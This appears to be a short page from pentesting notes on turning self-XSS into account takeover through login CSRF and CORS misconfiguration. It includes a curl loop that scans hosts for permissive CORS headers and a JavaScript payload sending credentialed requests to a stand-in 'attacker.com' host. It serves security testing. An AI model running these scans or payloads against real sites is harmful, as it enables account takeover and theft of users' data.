Self-XSS Bypass

CSRF In Login

  • Search for csrf in login and now attacker force the victim to login ton his account be affected with the js execution

Using fetchLater()

CORS + Self-XSS to ATO Checklist

  1. Got Self-XSS?: Confirm self-XSS vulnerability.

  2. Check CORS Misconfig: Run cat corstexturl.txt | CorsMe or cat corstexturl.txt | soru -u | anew | while read host; do curl -s --path-as-is --insecure -H "Origin: test.com" "$host" | grep -qs "Access-control-allow-origin: test.com" && echo "$host \033[0;31m cors Vulnerable"; done.

  3. Exploit CORS: Replace XSS payload with:

    function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.status == 200) {
      alert(this.responseText);
      document.getElementById("demo").innerHTML = this.responseText;
    }
  };
  xhttp.open("GET", "https://www.attacker.com/api/account", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
cors();

References

PreviousXSS-HTML InjectionNextImproper Authentication

Last updated

Was this helpful?